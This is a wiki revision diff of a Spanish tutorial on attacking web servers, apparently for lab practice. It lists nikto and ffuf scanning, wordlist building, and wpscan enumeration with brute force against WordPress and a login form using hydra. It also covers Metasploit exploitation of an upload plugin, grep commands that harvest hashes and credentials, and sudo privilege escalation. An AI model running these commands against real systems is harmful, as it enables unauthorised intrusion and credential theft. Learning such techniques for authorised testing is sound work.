Herramientas de usuario

Herramientas del sitio


tutorial:hacking-servidores

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión
Revisión previa
tutorial:hacking-servidores [2025/04/28 01:51]
truper
tutorial:hacking-servidores [2025/05/12 05:00] (actual)
truper
Línea 47: Línea 47:
   * %%curl -I http://​dominio.com%%   * %%curl -I http://​dominio.com%%
  
-**7º Fuerza bruta y pistas**+**7º Escaner __nikto__, específico para servidores web y útil si no sabemos interpretar bien los encabezados http del comando anterior** 
 +  * **Parámetros:​** 
 +    * -h ip 
 +    * -p puerto 
 +  * **Ejemplo:​** 
 +    * nikto -h %%http://​192.168.0.227%% -p 80 -output scan_nikto.txt 
 + 
 +**8º Fuerza bruta y pistas**
   * **Descargar,​ conocer seclists, un conjunto de diccionarios de fuerza bruta para poder hacer fuzzing**   * **Descargar,​ conocer seclists, un conjunto de diccionarios de fuerza bruta para poder hacer fuzzing**
     * %%gitclone https://​github.com/​danielmiessler/​SecLists.git%% ​       * %%gitclone https://​github.com/​danielmiessler/​SecLists.git%% ​  
Línea 54: Línea 61:
       * %%cewl http://​dominio.com -w lista_palabras.txt%%       * %%cewl http://​dominio.com -w lista_palabras.txt%%
   * **Con las pistas más relevantes que saquemos de lista_palabras.txt y del resto analizado crear un diccionario de fuerza bruta a medida**   * **Con las pistas más relevantes que saquemos de lista_palabras.txt y del resto analizado crear un diccionario de fuerza bruta a medida**
-      * %%john --wordlist=palabras_relevantes.txt ​--rules --stdout ​> diccionario.txt%%+      * %%princeprocessor ​palabras_relevantes.txt > diccionario.txt%%
  
  
  
-**8º Probar a hacer fuzzing ​a ver si hay algún ​panel de login o algo útilejemplos:** \\+**9º Identificar aplicaciones web instaladas, //​**CMS**//​** 
 +  * Hacer **fuzzing** para descubrir rutas, archivos de interés y **CMS** instalado 
 +    * p1=directory-list-2.3-medium.txt 
 +    * ffuf -u %%http://​ip/​FUZZ -w $p1%% -ac -fw 60000-90894 
 +    * ffuf -u %%http://​ip/​admin/​FUZZ -w $p1%% -ac -fw 60000-90894 
 +    * feroxbuster -u %%http://​pagina.com -w%% $p1 -o resultado.txt -x php,​html,​txt 
 +  * Encontrar **paneles de login** (rutas por defecto de instalación) 
 +  * Encontrar **versión** de **CMS** en el **código** fuente **html** de la página principal 
 +  * Buscar ​si hay **exploits para** esa versión de **CMS** 
 +  * Buscar si hay **nombre** de **usuario** en la página principal del **CMS** 
 +  * En **wordpress** 
 +    * Enumerar **plugins, usuarios**:​ 
 +      * %%wpscan --url http://​192.168.0.137/​wordpress --enumerate u,p%% 
 +    * **Ataque con acceso** 
 +      * 1º ataque de **fuerza bruta** 
 +        * A **xmlrpc.php de wordpress** (que permite múltiples intentos de login en una sola solicitud.) 
 +          * %%wpscan --url http://​192.168.0.137/​wordpress -U maria -P rockyou.txt%% 
 +        * Al **panel de login** como en cualquier otro **CMS** (menos eficiente y más dificil de escribir) 
 +          * Con **hydra** 
 +            * data="​cadena del inspector de código de firefox del archivo login.php"​ 
 +            * hydra -l pepe -P rockyou.txt url http-post-form data 
 +          * Con un script hecho a medida como el de [[https://​github.com/​0xDTC/​Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/​blob/​master/​CVE-2019-17240|Bludit]] 
 +       * 2º Una vez descubierta la contraseña se explota una **vulnerabilidad** en un **plugin de subida de archivos** 
 +         * Desde metasploit (fácil) 
 +           * Comandos 
 +             * search wordpress 
 +             * use 0 
 +             * show options 
 +             * setrun 
 +             * una vez dentro se obtiene **shell** como usuario **www-data** y: 
 +               Se buscan ​**hashes y credenciales** por los archivos de la ruta del **CMS** __%%/​var/​www/​html/​loquesea%%__ 
 +                 * %%grep -irE '​[a-z]+:​\$' /​var/​www/​cms/​*%%  
 +                 * %%grep -irE '​[a-z]+@gmail'​ /​var/​www/​cms/​*%% 
 +               * Obtenido el **hash** se intenta **descifrar** en **[[https://​crackstation.net|crackstation]]** 
 +               * Se intenta hacer **escalada a root** 
 +                 * **sudo -l** (con el que estamos), **sudo -l -U www-data** 
 +                   * (ALL : ALL) ALL 
 +                   * (ALL) NOPASSWD: ALL ->  El usuario puede ejecutar cualquier comando como root sin necesidad de contraseña. Escalada inmediata. 
 +         * creando el archivo malicioso (payload) con metasploit que contiene una reverse shell (más difícil)
  
-  ​* ffuf -u %%http://​ip/​FUZZ -w directory-list-2.3-medium.txt%% -ac -fw 60000-90894 +  ​
-  * ffuf -u %%http://​ip/​admin/​FUZZ -w directory-list-2.3-medium.txt%% -ac -fw 60000-90894+
  
 .....continuará. Feliz hacking 8-) .....continuará. Feliz hacking 8-)
tutorial/hacking-servidores.1745797909.txt.gz · Última modificación: 2025/04/28 01:51 por truper